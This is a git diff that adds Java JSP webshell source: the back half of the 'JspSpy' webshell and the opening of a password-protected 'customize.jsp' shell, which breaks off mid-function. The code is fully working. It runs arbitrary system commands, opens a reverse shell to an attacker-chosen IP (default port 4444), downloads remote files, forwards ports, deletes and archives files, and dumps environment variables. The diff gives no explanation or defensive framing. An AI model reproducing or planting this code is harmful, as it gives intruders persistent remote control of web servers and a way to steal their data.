"+ +"

"+ +"
"+ +"
"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
"+ +"
"+ +"

Set File Property »

"+ +"

Current file (fullpath)

"+ +" "+ +"

Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

"+ +"

Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

"+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
"+ +"
"+ +"

Execute Program »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"+ +"

Execute Shell »

"+ +"

"+ +""+ +""+ +"Parameter
"+ +""+ +"

"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("
"); +out.println("
");
+String command = request.getParameter("command");
+if (!Util.isEmpty(command)) {
+Process pro = Runtime.getRuntime().exec(command);
+BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
+String s = reader.readLine();
+while (s != null) {
+out.println(Util.htmlEncode(Util.getStr(s)));
+s = reader.readLine();
+}
+reader.close();
+out.println("
"); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.forjj.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
"+ +"
"+ +"

Remote File DownLoad »

"+ +"

"+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MoveInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String src = request.getParameter("src"); +String target = request.getParameter("to"); +if (!Util.isEmpty(target) && !Util.isEmpty(src)) { +File file = new File(src); +if(file.renameTo(new File(target))) { +JSession.setAttribute(MSG,"Move File Success!"); +} else { +String msg = "Move File Failed!"; +if (file.isDirectory()) { +msg += "The Move Will Failed When The Directory Is Not Empty."; +} +JSession.setAttribute(MSG,msg); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class RemoteDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String dir = request.getParameter("dir"); +File file = new File(dir); +if (file.exists()) { +deleteFile(file); +deleteDir(file); +} + +JSession.setAttribute(MSG,"Remove Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +public void deleteFile(File f) { +if (f.isFile()) { +f.delete(); +}else { +File[] list = f.listFiles(); +for (File ff:list) { +deleteFile(ff); +} +} +} +public void deleteDir(File f) { +File[] list = f.listFiles(); +if (list.length == 0) { +f.delete(); +} else { +for (File ff:list) { +deleteDir(ff); +} +deleteDir(f); +} +} +} +private static class PackBatchInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String files = request.getParameter("files"); +if (Util.isEmpty(files)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String[] arr = files.split(","); +for (String f:arr) { +File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f); +ZipEntry entry = new ZipEntry(pF.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(pF); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +zout.close(); +JSession.setAttribute(MSG,"Pack Files Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class PackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String packedFile = request.getParameter("packedfile"); +if (Util.isEmpty(packedFile)) +return; +String saveFileName = request.getParameter("savefilename"); +File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName); +if (saveF.exists()) { +JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +File pF = new File(packedFile); +ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF))); +String base = ""; +if (pF.isDirectory()) { +zipDir(pF,base,zout); +} else { +zipFile(pF,base,zout); +} +zout.close(); +JSession.setAttribute(MSG,"Pack File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +public void zipDir(File f,String base,ZipOutputStream zout) throws Exception { +if (f.isDirectory()) { +File[] arr = f.listFiles(); +for (File ff:arr) { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/")) +tmpBase += "/"; +zipDir(ff,tmpBase+f.getName(),zout); +} +} else { +String tmpBase = base; +if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/")) +tmpBase += "/"; +zipFile(f,tmpBase,zout); +} +} +public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{ +ZipEntry entry = new ZipEntry(base+f.getName()); +zout.putNextEntry(entry); +FileInputStream fInput = new FileInputStream(f); +int len = 0; +byte[] buf = new byte[1024]; +while ((len = fInput.read(buf)) != -1) { +zout.write(buf, 0, len); +zout.flush(); +} +fInput.close(); +} +} +private static class UnPackInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String savepath = request.getParameter("savepath"); +String zipfile = request.getParameter("zipfile"); +if (Util.isEmpty(savepath) || Util.isEmpty(zipfile)) +return; +File save = new File(savepath); +save.mkdirs(); +ZipFile file = new ZipFile(new File(zipfile)); +Enumeration e = file.entries(); +while (e.hasMoreElements()) { +ZipEntry en = (ZipEntry) e.nextElement(); +String entryPath = en.getName(); +int index = entryPath.lastIndexOf("/"); +if (index != -1) +entryPath = entryPath.substring(0,index); +File absEntryFile = new File(save,entryPath); +if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1)) +absEntryFile.mkdirs(); +BufferedOutputStream output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.forjj.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

PortMap >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

"+ +" "+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); +remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); +JSession.removeAttribute("ip"); +JSession.removeAttribute("port"); +JSession.removeAttribute("program"); +JSession.removeAttribute("done"); +if (Util.isEmpty(ip)) +ip = request.getRemoteAddr(); +if (Util.isEmpty(port) || !Util.isInteger(port.toString())) +port = "4444"; +if (Util.isEmpty(program)) +program = "cmd.exe"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +""+ +"

Back Connect >>

"+ +"
"+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
Your Ip :"+ +" "+ +" Your Port :"+ +" Program To Back :"+ +"

"+ +" "+ +"
"+ +"
"+ +"
"+ +"
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class BackConnectInvoker extends DefaultInvoker { +public boolean doAfter(){return false;} +public boolean doBefore(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String ip = request.getParameter("ip"); +String port = request.getParameter("port"); +String program = request.getParameter("program"); +if (Util.isEmpty(ip) || Util.isEmpty(program) || !Util.isInteger(port)) +return; +Socket socket = new Socket(ip,Integer.parseInt(port)); +Process process = Runtime.getRuntime().exec(program); +(new StreamConnector(process.getInputStream(), socket.getOutputStream())).start(); +(new StreamConnector(socket.getInputStream(), process.getOutputStream())).start(); +JSession.setAttribute("done","Back Connect Success!"); +JSession.setAttribute("ip",ip); +JSession.setAttribute("port",port); +JSession.setAttribute("program",program); +response.sendRedirect(SHELL_NAME+"?o=vbc"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class JspEnvInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""+ +" "+ +" "+ +" "+ +"

System Properties >>

"+ +"
"+ +"
"+ +"
    "); +Properties pro = System.getProperties(); +Enumeration names = pro.propertyNames(); +while (names.hasMoreElements()){ +String name = (String)names.nextElement(); +out.println("
  • "+Util.htmlEncode(name)+" : "+Util.htmlEncode(pro.getProperty(name))+"
    • "); +} +out.println("

System Environment >>

    "); +Map envs = System.getenv(); +Set> entrySet = envs.entrySet(); +for (Map.Entry en:entrySet) { +out.println("
  • "+Util.htmlEncode(en.getKey())+" : "+Util.htmlEncode(en.getValue())+"
    • "); +} +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class TopInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
"+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
JspSpy Ver: 2009"+request.getHeader("host")+" ("+InetAddress.getLocalHost().getHostAddress()+")
Logout | "+ +" File Manager | "+ +" DataBase Manager | "+ +" Execute Command | "+ +" Shell OnLine | "+ +" Back Connect | "+ +" Port Scan | "+ +" Download Remote File | "+ +" ClipBoard | "+ +" Remote Control | "+ +" Port Map | "+ +" JSP Env "+ +"
"); +if (JSession.getAttribute(MSG) != null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VOnLineShellInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println(""); +out.println(""+ +" "+ +" "+ +" "+ +"
"); +out.println("

Shell OnLine »


"); +out.println("
"+ +" "+ +" "+ +" Notice ! If You Are Using IE , You Must Input A Command First After You Start Or You Will Not See The Echo"+ +"
"+ +"
"+ +" "+ +"
"+ +" "+ +" "+ +" "+ +" Auto Scroll"+ +" "+ +"
"+ +" " +); +out.println("
"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class OnLineInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String type = request.getParameter("type"); +if (Util.isEmpty(type)) +return; +if (type.toLowerCase().equals("start")) { +String exe = request.getParameter("exe"); +if (Util.isEmpty(exe)) +return; +Process pro = Runtime.getRuntime().exec(exe); +ByteArrayOutputStream outs = new ByteArrayOutputStream(); +response.setContentLength(100000000); +response.setContentType("text/html;charset="+Charset.defaultCharset().name()); +OnLineProcess olp = new OnLineProcess(pro); +JSession.setAttribute(SHELL_ONLINE,olp); +new OnLineConnector(new ByteArrayInputStream(outs.toByteArray()),pro.getOutputStream(),"exeOclientR",olp).start(); +new OnLineConnector(pro.getInputStream(),response.getOutputStream(),"exeRclientO",olp).start(); +new OnLineConnector(pro.getErrorStream(),response.getOutputStream(),"exeRclientO",olp).start();//错误信息流。 +Thread.sleep(1000 * 60 * 60 * 24); +} else if (type.equals("ecmd")) { +Object o = JSession.getAttribute(SHELL_ONLINE); +String cmd = request.getParameter("cmd"); +if (Util.isEmpty(cmd)) +return; +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.setCmd(cmd); +} else { +Object o = JSession.getAttribute(SHELL_ONLINE); +if (o == null) +return; +OnLineProcess olp = (OnLineProcess)o; +olp.stop(); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} + +static{ +ins.put("script",new ScriptInvoker()); +ins.put("before",new BeforeInvoker()); +ins.put("after",new AfterInvoker()); +ins.put("deleteBatch",new DeleteBatchInvoker()); +ins.put("clipboard",new ClipBoardInvoker()); +ins.put("vRemoteControl",new VRemoteControlInvoker()); +ins.put("gc",new GcInvoker()); +ins.put("vPortScan",new VPortScanInvoker()); +ins.put("portScan",new PortScanInvoker()); +ins.put("vConn",new VConnInvoker()); +ins.put("dbc",new DbcInvoker()); +ins.put("executesql",new ExecuteSQLInvoker()); +ins.put("vLogin",new VLoginInvoker()); +ins.put("login",new LoginInvoker()); +ins.put("filelist", new FileListInvoker()); +ins.put("logout",new LogoutInvoker()); +ins.put("upload",new UploadInvoker()); +ins.put("copy",new CopyInvoker()); +ins.put("bottom",new BottomInvoker()); +ins.put("vCreateFile",new VCreateFileInvoker()); +ins.put("vEdit",new VEditInvoker()); +ins.put("createFile",new CreateFileInvoker()); +ins.put("vEditProperty",new VEditPropertyInvoker()); +ins.put("editProperty",new EditPropertyInvoker()); +ins.put("vs",new VsInvoker()); +ins.put("shell",new ShellInvoker()); +ins.put("down",new DownInvoker()); +ins.put("vd",new VdInvoker()); +ins.put("downRemote",new DownRemoteInvoker()); +ins.put("index",new IndexInvoker()); +ins.put("mkdir",new MkDirInvoker()); +ins.put("move",new MoveInvoker()); +ins.put("removedir",new RemoteDirInvoker()); +ins.put("packBatch",new PackBatchInvoker()); +ins.put("pack",new PackInvoker()); +ins.put("unpack",new UnPackInvoker()); +ins.put("vmp",new VmpInvoker()); +ins.put("vbc",new VbcInvoker()); +ins.put("backConnect",new BackConnectInvoker()); +ins.put("jspEnv",new JspEnvInvoker()); +ins.put("smp",new SmpInvoker()); +ins.put("mapPort",new MapPortInvoker()); +ins.put("top",new TopInvoker()); +ins.put("vso",new VOnLineShellInvoker()); +ins.put("online",new OnLineInvoker()); +} +%> +<% +try { +String o = request.getParameter("o"); +if (!Util.isEmpty(o)) { +Invoker in = ins.get(o); +if (in == null) { +response.sendRedirect(SHELL_NAME+"?o=index"); +} else { +if (in.doBefore()) { +String path = request.getParameter("folder"); +if (!Util.isEmpty(path)) +session.setAttribute(CURRENT_DIR,path); +ins.get("before").invoke(request,response,session); +ins.get("script").invoke(request,response,session); +ins.get("top").invoke(request,response,session); +} +in.invoke(request,response,session); +if (!in.doAfter()) { +return; +}else{ +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +} +} else { +response.sendRedirect(SHELL_NAME+"?o=index"); +} +} catch (Exception e) { +ByteArrayOutputStream bout = new ByteArrayOutputStream(); +e.printStackTrace(new PrintStream(bout)); +session.setAttribute(CURRENT_DIR,SHELL_DIR); +Util.outMsg(out,Util.htmlEncode(new String(bout.toByteArray())).replace("\n","
"),"left"); +bout.close(); +out.flush(); +ins.get("bottom").invoke(request,response,session); +ins.get("after").invoke(request,response,session); +} +%> diff --git a/jsp/customize.jsp b/jsp/customize.jsp new file mode 100644 index 0000000..508420c --- /dev/null +++ b/jsp/customize.jsp @@ -0,0 +1,297 @@ +<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%> +<%!String Pwd = "c"; + + String EC(String s, String c) throws Exception { + return s; + }//new String(s.getBytes("ISO-8859-1"),c);} + + Connection GC(String s) throws Exception { + String[] x = s.trim().split("\r\n"); + Class.forName(x[0].trim()).newInstance(); + Connection c = DriverManager.getConnection(x[1].trim()); + if (x.length > 2) { + c.setCatalog(x[2].trim()); + } + return c; + } + + void AA(StringBuffer sb) throws Exception { + File r[] = File.listRoots(); + for (int i = 0; i < r.length; i++) { + sb.append(r[i].toString().substring(0, 2)); + } + } + + void BB(String s, StringBuffer sb) throws Exception { + File oF = new File(s), l[] = oF.listFiles(); + String sT, sQ, sF = ""; + java.util.Date dt; + SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss"); + for (int i = 0; i < l.length; i++) { + dt = new java.util.Date(l[i].lastModified()); + sT = fm.format(dt); + sQ = l[i].canRead() ? "R" : ""; + sQ += l[i].canWrite() ? " W" : ""; + if (l[i].isDirectory()) { + sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length() + + "\t" + sQ + "\n"); + } else { + sF += l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t" + + sQ + "\n"; + } + } + sb.append(sF); + } + + void EE(String s) throws Exception { + File f = new File(s); + if (f.isDirectory()) { + File x[] = f.listFiles(); + for (int k = 0; k < x.length; k++) { + if (!x[k].delete()) { + EE(x[k].getPath()); + } + } + } + f.delete(); + } + + void FF(String s, HttpServletResponse r) throws Exception { + int n; + byte[] b = new byte[512]; + r.reset(); + ServletOutputStream os = r.getOutputStream(); + BufferedInputStream is = new BufferedInputStream(new FileInputStream(s)); + os.write(("->" + "|").getBytes(), 0, 3); + while ((n = is.read(b, 0, 512)) != -1) { + os.write(b, 0, n); + } + os.write(("|" + "<-").getBytes(), 0, 3); + os.close(); + is.close(); + } + + void GG(String s, String d) throws Exception { + String h = "0123456789ABCDEF"; + int n; + File f = new File(s); + f.createNewFile(); + FileOutputStream os = new FileOutputStream(f); + for (int i = 0; i < d.length(); i += 2) { + os + .write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d + .charAt(i + 1)))); + } + os.close(); + } + + void HH(String s, String d) throws Exception { + File sf = new File(s), df = new File(d); + if (sf.isDirectory()) { + if (!df.exists()) { + df.mkdir(); + } + File z[] = sf.listFiles(); + for (int j = 0; j < z.length; j++) { + HH(s + "/" + z[j].getName(), d + "/" + z[j].getName()); + } + } else { + FileInputStream is = new FileInputStream(sf); + FileOutputStream os = new FileOutputStream(df); + int n; + byte[] b = new byte[512]; + while ((n = is.read(b, 0, 512)) != -1) { + os.write(b, 0, n); + } + is.close(); + os.close(); + } + } + + void II(String s, String d) throws Exception { + File sf = new File(s), df = new File(d); + sf.renameTo(df); + } + + void JJ(String s) throws Exception { + File f = new File(s); + f.mkdir(); + } + + void KK(String s, String 